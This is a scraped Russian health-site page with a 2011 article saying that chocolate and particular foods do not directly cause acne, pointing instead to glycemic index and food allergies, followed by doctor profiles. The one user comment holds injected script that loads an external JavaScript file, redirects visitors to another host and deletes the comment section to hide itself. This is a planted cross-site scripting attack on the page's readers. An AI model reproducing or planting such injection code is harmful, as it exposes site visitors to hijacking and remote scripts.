Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Шоколад ни в чем не винов...  >>  Шоколад ни в чем не виноват
 
Обратная связь
 

Шоколад ни в чем не виноват

Размер шрифта
05 октября 2011 07:15
  • google_analytics: false
  • Нравится

Может ли еда вызвать прыщи? Это очень популярный вопрос у подростков. От чего только они не отказываются в надежде сохранить кожу красивой, но нет ничего удивительного в том, что толк от подобных отказов равен нулю.

1

На сегодняшний день никаких данных о том, что конкретная еда влияет на вспышки акне, нет. Да-да, ни шоколад, ни газировка никакого отношения к прыщам не имеют – ни одни медицинские исследования не смогли пока доказать прямое влияние еды на появление акне. Но есть два «но».

  1. Связь все-таки имеется, только выражена она не в названии конкретного продукта питания, а в гликемическом индексе – показателе влияния питания на уровень сахара в крови. Механизм этой взаимосвязи пока неизвестен, и исследования продолжаются, но уже замечено, что чем ниже гликемический индекс продуктов, тем меньше прыщей на лице. К полезным продуктам тут можно отнести, например, черный хлеб, все виды ягод, семена подсолнуха.

  2. Пищевая аллергия: вот еще одна опосредованная связь между питанием и состоянием кожи. Если есть аллергическая реакция, то кожа реагирует на определенные продукты, как на токсины. Иммунная система «вступает в бой» с пищей, вызывая различные реакции, что проявляется, в том числе, в виде прыщей. Так что если у вас аллергия на какао-бобы или жиры в составе шоколада, тогда шоколад приведет к появлению прыщей.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:07

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.